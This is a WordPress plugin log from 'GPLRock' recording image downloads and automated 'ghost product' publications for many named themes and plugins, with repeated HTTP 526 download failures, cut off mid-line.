[04-Apr-2026 18:07:25 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-metro-wordpress-theme [04-Apr-2026 18:07:27 UTC] GPLRock: Image downloaded successfully for product real-soccer-sport-clubs-responsive-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37070a7d.jpg [04-Apr-2026 18:07:27 UTC] GPLRock: Using pre-downloaded image for product real-soccer-sport-clubs-responsive-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37070a7d.jpg [04-Apr-2026 18:07:27 UTC] GPLRock: Ghost product published with image - Product ID: real-soccer-sport-clubs-responsive-wp-theme [04-Apr-2026 18:14:14 UTC] GPLRock: Image downloaded successfully for product city-government-municipal-portal-political-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-daa4e179.jpg [04-Apr-2026 18:14:14 UTC] GPLRock: Using pre-downloaded image for product city-government-municipal-portal-political-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-daa4e179.jpg [04-Apr-2026 18:14:14 UTC] GPLRock: Ghost product published with image - Product ID: city-government-municipal-portal-political-wordpress-theme [04-Apr-2026 18:14:16 UTC] GPLRock: Image downloaded successfully for product css3-tooltips-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27b19e24.jpg [04-Apr-2026 18:14:16 UTC] GPLRock: Using pre-downloaded image for product css3-tooltips-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27b19e24.jpg [04-Apr-2026 18:14:16 UTC] GPLRock: Ghost product published with image - Product ID: css3-tooltips-for-wordpress [04-Apr-2026 18:14:17 UTC] GPLRock: Image downloaded successfully for product buisson-gardening-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f817ab49.jpg [04-Apr-2026 18:14:18 UTC] GPLRock: Using pre-downloaded image for product buisson-gardening-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f817ab49.jpg [04-Apr-2026 18:14:18 UTC] GPLRock: Ghost product published with image - Product ID: buisson-gardening-wordpress-theme [04-Apr-2026 18:14:19 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-advanced-reports-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-629b35b5.jpg [04-Apr-2026 18:14:19 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-advanced-reports-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-629b35b5.jpg [04-Apr-2026 18:14:19 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-advanced-reports-addon [04-Apr-2026 18:14:20 UTC] GPLRock: Image downloaded successfully for product corredo-bike-race-sports-events-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61108a2b.jpg [04-Apr-2026 18:14:20 UTC] GPLRock: Using pre-downloaded image for product corredo-bike-race-sports-events-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-61108a2b.jpg [04-Apr-2026 18:14:20 UTC] GPLRock: Ghost product published with image - Product ID: corredo-bike-race-sports-events-wordpress-theme [04-Apr-2026 18:14:23 UTC] GPLRock: Image downloaded successfully for product angela-family-planning-clinic-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46cf1798.png [04-Apr-2026 18:14:23 UTC] GPLRock: Using pre-downloaded image for product angela-family-planning-clinic-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46cf1798.png [04-Apr-2026 18:14:23 UTC] GPLRock: Ghost product published with image - Product ID: angela-family-planning-clinic-wordpress-theme [04-Apr-2026 18:14:24 UTC] GPLRock: Image downloaded successfully for product clever-woocommerce-ajax-product-filter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d035c50b.jpg [04-Apr-2026 18:14:24 UTC] GPLRock: Using pre-downloaded image for product clever-woocommerce-ajax-product-filter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d035c50b.jpg [04-Apr-2026 18:14:24 UTC] GPLRock: Ghost product published with image - Product ID: clever-woocommerce-ajax-product-filter [04-Apr-2026 18:14:26 UTC] GPLRock: Image downloaded successfully for product caden-mega-store-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd358fab.jpg [04-Apr-2026 18:14:26 UTC] GPLRock: Using pre-downloaded image for product caden-mega-store-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cd358fab.jpg [04-Apr-2026 18:14:26 UTC] GPLRock: Ghost product published with image - Product ID: caden-mega-store-responsive-wordpress-theme [04-Apr-2026 18:14:28 UTC] GPLRock: Image downloaded successfully for product automatewoo-birthdays-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06c1572c.jpg [04-Apr-2026 18:14:28 UTC] GPLRock: Using pre-downloaded image for product automatewoo-birthdays-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-06c1572c.jpg [04-Apr-2026 18:14:28 UTC] GPLRock: Ghost product published with image - Product ID: automatewoo-birthdays-add-on [04-Apr-2026 18:14:30 UTC] GPLRock: Image downloaded successfully for product bege-responsive-woocommerce-wordpress-theme-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00d548ce.jpg [04-Apr-2026 18:14:30 UTC] GPLRock: Using pre-downloaded image for product bege-responsive-woocommerce-wordpress-theme-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00d548ce.jpg [04-Apr-2026 18:14:30 UTC] GPLRock: Ghost product published with image - Product ID: bege-responsive-woocommerce-wordpress-theme-2 [04-Apr-2026 18:16:40 UTC] GPLRock: Image downloaded successfully for product osvald-finance-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05d3d5a4.webp [04-Apr-2026 18:16:40 UTC] GPLRock: Using pre-downloaded image for product osvald-finance-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05d3d5a4.webp [04-Apr-2026 18:16:40 UTC] GPLRock: Ghost product published with image - Product ID: osvald-finance-consulting-elementor-template-kit [04-Apr-2026 18:16:42 UTC] GPLRock: Image downloaded successfully for product organica-eco-farm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11fe0f72.webp [04-Apr-2026 18:16:42 UTC] GPLRock: Using pre-downloaded image for product organica-eco-farm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11fe0f72.webp [04-Apr-2026 18:16:42 UTC] GPLRock: Ghost product published with image - Product ID: organica-eco-farm-elementor-template-kit [04-Apr-2026 18:16:43 UTC] GPLRock: Image downloaded successfully for product orgakit-organic-farm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66aa1d2d.webp [04-Apr-2026 18:16:43 UTC] GPLRock: Using pre-downloaded image for product orgakit-organic-farm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-66aa1d2d.webp [04-Apr-2026 18:16:43 UTC] GPLRock: Ghost product published with image - Product ID: orgakit-organic-farm-elementor-template-kit [04-Apr-2026 18:16:45 UTC] GPLRock: Image downloaded successfully for product orfa-organic-farm-products-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ef1f9f1.webp [04-Apr-2026 18:16:45 UTC] GPLRock: Using pre-downloaded image for product orfa-organic-farm-products-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ef1f9f1.webp [04-Apr-2026 18:16:45 UTC] GPLRock: Ghost product published with image - Product ID: orfa-organic-farm-products-elementor-template-kit [04-Apr-2026 18:16:46 UTC] GPLRock: Image downloaded successfully for product oren-creative-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5a64f8ab.webp [04-Apr-2026 18:16:46 UTC] GPLRock: Using pre-downloaded image for product oren-creative-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5a64f8ab.webp [04-Apr-2026 18:16:46 UTC] GPLRock: Ghost product published with image - Product ID: oren-creative-business-elementor-template-kit [04-Apr-2026 18:16:48 UTC] GPLRock: Image downloaded successfully for product orangebee-agency-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b77cff39.webp [04-Apr-2026 18:16:48 UTC] GPLRock: Using pre-downloaded image for product orangebee-agency-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b77cff39.webp [04-Apr-2026 18:16:48 UTC] GPLRock: Ghost product published with image - Product ID: orangebee-agency-template-kit [04-Apr-2026 18:16:49 UTC] GPLRock: Image downloaded successfully for product orange-cv-creative-portfolio-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2df6e67.webp [04-Apr-2026 18:16:49 UTC] GPLRock: Using pre-downloaded image for product orange-cv-creative-portfolio-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2df6e67.webp [04-Apr-2026 18:16:49 UTC] GPLRock: Ghost product published with image - Product ID: orange-cv-creative-portfolio-elementor-template-kits [04-Apr-2026 18:16:50 UTC] GPLRock: Image downloaded successfully for product oppa-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07801b82.webp [04-Apr-2026 18:16:51 UTC] GPLRock: Using pre-downloaded image for product oppa-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07801b82.webp [04-Apr-2026 18:16:51 UTC] GPLRock: Ghost product published with image - Product ID: oppa-personal-portfolio-elementor-template-kit [04-Apr-2026 18:16:52 UTC] GPLRock: Image downloaded successfully for product onova-technology-it-solutions-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7e6f79.webp [04-Apr-2026 18:16:52 UTC] GPLRock: Using pre-downloaded image for product onova-technology-it-solutions-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7e6f79.webp [04-Apr-2026 18:16:52 UTC] GPLRock: Ghost product published with image - Product ID: onova-technology-it-solutions-elementor-template-kit [04-Apr-2026 18:16:53 UTC] GPLRock: Image downloaded successfully for product onestudio-photographer-agency-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2068a307.webp [04-Apr-2026 18:16:53 UTC] GPLRock: Using pre-downloaded image for product onestudio-photographer-agency-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2068a307.webp [04-Apr-2026 18:16:53 UTC] GPLRock: Ghost product published with image - Product ID: onestudio-photographer-agency-service-elementor-template-kit [04-Apr-2026 18:17:57 UTC] GPLRock: Image downloaded successfully for product mythemeshop-my-wp-mega-menu (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0004fd95.jpg [04-Apr-2026 18:17:57 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-my-wp-mega-menu: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0004fd95.jpg [04-Apr-2026 18:17:57 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-my-wp-mega-menu [04-Apr-2026 18:17:58 UTC] GPLRock: Image downloaded successfully for product css-igniter-pinmaister-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8681234.jpg [04-Apr-2026 18:17:58 UTC] GPLRock: Using pre-downloaded image for product css-igniter-pinmaister-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8681234.jpg [04-Apr-2026 18:17:58 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-pinmaister-wordpress-theme [04-Apr-2026 18:18:00 UTC] GPLRock: Image downloaded successfully for product woocommerce-germanized-pro-by-vendidero (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d3ce344.jpg [04-Apr-2026 18:18:00 UTC] GPLRock: Using pre-downloaded image for product woocommerce-germanized-pro-by-vendidero: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d3ce344.jpg [04-Apr-2026 18:18:00 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-germanized-pro-by-vendidero [04-Apr-2026 18:18:02 UTC] GPLRock: Image downloaded successfully for product formidable-forms-constant-contact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b971076b.jpg [04-Apr-2026 18:18:02 UTC] GPLRock: Using pre-downloaded image for product formidable-forms-constant-contact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b971076b.jpg [04-Apr-2026 18:18:02 UTC] GPLRock: Ghost product published with image - Product ID: formidable-forms-constant-contact [04-Apr-2026 18:18:04 UTC] GPLRock: Image downloaded successfully for product mainwp-page-speed (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0196c872.jpg [04-Apr-2026 18:18:04 UTC] GPLRock: Using pre-downloaded image for product mainwp-page-speed: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0196c872.jpg [04-Apr-2026 18:18:04 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-page-speed [04-Apr-2026 18:18:05 UTC] GPLRock: Image downloaded successfully for product woocommerce-tab-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b19bcb56.jpg [04-Apr-2026 18:18:05 UTC] GPLRock: Using pre-downloaded image for product woocommerce-tab-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b19bcb56.jpg [04-Apr-2026 18:18:05 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-tab-manager [04-Apr-2026 18:18:07 UTC] GPLRock: Image downloaded successfully for product wordpress-awesome-import-export-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dea14f2f.jpg [04-Apr-2026 18:18:07 UTC] GPLRock: Using pre-downloaded image for product wordpress-awesome-import-export-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dea14f2f.jpg [04-Apr-2026 18:18:07 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-awesome-import-export-plugin [04-Apr-2026 18:18:09 UTC] GPLRock: Image downloaded successfully for product livepreview-theme-demo-bar-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a954d493.jpg [04-Apr-2026 18:18:09 UTC] GPLRock: Using pre-downloaded image for product livepreview-theme-demo-bar-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a954d493.jpg [04-Apr-2026 18:18:09 UTC] GPLRock: Ghost product published with image - Product ID: livepreview-theme-demo-bar-for-wordpress [04-Apr-2026 18:18:10 UTC] GPLRock: Image downloaded successfully for product private-messages-astoundify (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6a5705c.jpg [04-Apr-2026 18:18:10 UTC] GPLRock: Using pre-downloaded image for product private-messages-astoundify: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6a5705c.jpg [04-Apr-2026 18:18:10 UTC] GPLRock: Ghost product published with image - Product ID: private-messages-astoundify [04-Apr-2026 18:18:12 UTC] GPLRock: Image downloaded successfully for product ninja-forms-clicksend-sms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2abf072e.jpg [04-Apr-2026 18:18:12 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-clicksend-sms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2abf072e.jpg [04-Apr-2026 18:18:12 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-clicksend-sms [04-Apr-2026 18:31:14 UTC] GPLRock: Image download failed for product off-the-shelf-online-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:14 UTC] GPLRock: Image download failed for product revolution-lightbox-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:16 UTC] GPLRock: Image download failed for product off-the-shelf-online-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:16 UTC] GPLRock: Image download failed for product revolution-lightbox-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/off-the-shelf---online-marketing-wordpress-theme-30177.webp for product off-the-shelf-online-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revolution-lightbox-wordpress--woocommerce-plugin-18024.webp for product revolution-lightbox-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:19 UTC] GPLRock: Image download failed for product revolution-lightbox-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:19 UTC] GPLRock: Image download failed for product off-the-shelf-online-marketing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:21 UTC] GPLRock: Image download failed for product revolution-lightbox-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:21 UTC] GPLRock: Image download failed for product off-the-shelf-online-marketing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revolution-lightbox-wordpress--woocommerce-plugin-18024.webp for product revolution-lightbox-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:23 UTC] GPLRock WARNING: Image download failed for product revolution-lightbox-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/revolution-lightbox-wordpress--woocommerce-plugin-18024.webp [04-Apr-2026 18:31:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/off-the-shelf---online-marketing-wordpress-theme-30177.webp for product off-the-shelf-online-marketing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:23 UTC] GPLRock WARNING: Image download failed for product off-the-shelf-online-marketing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/off-the-shelf---online-marketing-wordpress-theme-30177.webp [04-Apr-2026 18:31:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revolution-lightbox-wordpress-woocommerce-plugin [04-Apr-2026 18:31:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: off-the-shelf-online-marketing-wordpress-theme [04-Apr-2026 18:31:23 UTC] GPLRock: Image download failed for product visva-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:23 UTC] GPLRock: Image download failed for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:25 UTC] GPLRock: Image download failed for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:25 UTC] GPLRock: Image download failed for product visva-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-revolution-display-for-elementor-wordpress-plugin-1916.webp for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visva---architecture-wordpress-theme-15170.webp for product visva-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:28 UTC] GPLRock: Image download failed for product visva-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:28 UTC] GPLRock: Image download failed for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:30 UTC] GPLRock: Image download failed for product visva-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:30 UTC] GPLRock: Image download failed for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visva---architecture-wordpress-theme-15170.webp for product visva-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:32 UTC] GPLRock WARNING: Image download failed for product visva-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/visva---architecture-wordpress-theme-15170.webp [04-Apr-2026 18:31:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visva-architecture-wordpress-theme [04-Apr-2026 18:31:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-revolution-display-for-elementor-wordpress-plugin-1916.webp for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:32 UTC] GPLRock WARNING: Image download failed for product woocommerce-products-revolution-display-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-products-revolution-display-for-elementor-wordpress-plugin-1916.webp [04-Apr-2026 18:31:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-products-revolution-display-for-elementor-wordpress-plugin [04-Apr-2026 18:31:32 UTC] GPLRock: Image download failed for product hnice-modern-funiture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:32 UTC] GPLRock: Image download failed for product master-addons-forefront-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:34 UTC] GPLRock: Image download failed for product hnice-modern-funiture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:34 UTC] GPLRock: Image download failed for product master-addons-forefront-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hnice---modern-funiture-woocommerce-theme-24777.webp for product hnice-modern-funiture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-addons---forefront-addons-for-elementor-18098.webp for product master-addons-forefront-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:36 UTC] GPLRock: Image download failed for product hnice-modern-funiture-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:36 UTC] GPLRock: Image download failed for product master-addons-forefront-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:38 UTC] GPLRock: Image download failed for product hnice-modern-funiture-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:38 UTC] GPLRock: Image download failed for product master-addons-forefront-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hnice---modern-funiture-woocommerce-theme-24777.webp for product hnice-modern-funiture-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:41 UTC] GPLRock WARNING: Image download failed for product hnice-modern-funiture-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/hnice---modern-funiture-woocommerce-theme-24777.webp [04-Apr-2026 18:31:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-addons---forefront-addons-for-elementor-18098.webp for product master-addons-forefront-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:41 UTC] GPLRock WARNING: Image download failed for product master-addons-forefront-addons-for-elementor. URL: https://meldwp.com/wp-content/uploads/master-addons---forefront-addons-for-elementor-18098.webp [04-Apr-2026 18:31:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hnice-modern-funiture-woocommerce-theme [04-Apr-2026 18:31:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: master-addons-forefront-addons-for-elementor [04-Apr-2026 18:31:41 UTC] GPLRock: Image downloaded successfully for product forpets-food-shop-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f336cd9.webp [04-Apr-2026 18:31:41 UTC] GPLRock: Image download failed for product sumo-affiliates-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:41 UTC] GPLRock: Using pre-downloaded image for product forpets-food-shop-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f336cd9.webp [04-Apr-2026 18:31:41 UTC] GPLRock: Ghost product published with image - Product ID: forpets-food-shop-woocommerce-theme [04-Apr-2026 18:31:41 UTC] GPLRock: Image download failed for product shout-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:43 UTC] GPLRock: Image download failed for product sumo-affiliates-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:43 UTC] GPLRock: Image download failed for product shout-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-affiliates-pro---wordpress-plugin-688.webp for product sumo-affiliates-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shout---blogging-wordpress-theme-2562.webp for product shout-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:46 UTC] GPLRock: Image download failed for product sumo-affiliates-pro-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:46 UTC] GPLRock: Image download failed for product shout-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:48 UTC] GPLRock: Image download failed for product sumo-affiliates-pro-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:48 UTC] GPLRock: Image download failed for product shout-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 18:31:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shout---blogging-wordpress-theme-2562.webp for product shout-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:50 UTC] GPLRock WARNING: Image download failed for product shout-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shout---blogging-wordpress-theme-2562.webp [04-Apr-2026 18:31:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shout-blogging-wordpress-theme [04-Apr-2026 18:31:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sumo-affiliates-pro---wordpress-plugin-688.webp for product sumo-affiliates-pro-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 18:31:50 UTC] GPLRock WARNING: Image download failed for product sumo-affiliates-pro-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/sumo-affiliates-pro---wordpress-plugin-688.webp [04-Apr-2026 18:31:50 UTC] GPLRock WARNING: Ghost product published WITHOUT 